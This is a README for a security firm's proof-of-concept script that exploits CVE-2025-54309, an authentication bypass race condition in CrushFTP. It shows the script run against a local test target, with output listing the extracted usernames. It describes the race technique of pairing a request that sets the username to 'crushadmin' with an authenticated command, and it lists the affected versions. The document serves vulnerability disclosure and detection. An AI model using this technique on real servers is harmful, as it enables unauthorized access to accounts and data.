
# CVE-2025-54309
A CrushFTP Authentication Bypass Proof of Concept
 
See our [blog post](https://labs.watchtowr.com/) for technical details

# Detection in Action


```
python3 watchTowr-vs-CrushFTP-CVE-2025-54309.py http://127.0.0.1:8082
[*] Generated new c2f value: 6XDQ
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            
          
        watchTowr-vs-CrushFTP-CVE-2025-54309.py
        (*) CrushFTP Authentication Bypass Race Condition PoC
        
          - Sonny , watchTowr (sonny@watchTowr.com)

        CVEs: [CVE-2025-54309]
        
[*] CRUSHFTP RACE CONDITION POC
[*] TARGET: http://127.0.0.1:8082
[*] ENDPOINT: CrushFTP WebInterface getUserList
[*] ATTACK: 5000 requests with new c2f every 50 requests
============================================================
Starting race with 5000 request pairs...
============================================================
[*] Generated new c2f value: qUwd
[*] NEW SESSION: c2f=qUwd
[*] EXFILTRATED 3 USERS: crushadmin, default, TempAccount
[*] VULNERABLE! RACE CONDITION POSSIBLE!

```

# Description

This script is a proof of concept for CVE-2025-54309 against CrushFTP Interfaces. By creating a set of race requests sharing the same session identifiers, one request to set the username property to "crushadmin" and one request to execute an authenticated command as this user, its possible in this PoC to extract the list of usernames. More details are described within our [blog post] (https://labs.watchtowr.com/).

# Affected Versions

* before 10.8.5
* 11 before 11.3.4_23

More details at [CrushFTP Advisory](https://www.crushftp.com/crush11wiki/Wiki.jsp?page=CompromiseJuly2025)

# Follow [watchTowr](https://watchTowr.com) Labs

For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team 

- https://labs.watchtowr.com/
- https://x.com/watchtowrcyber
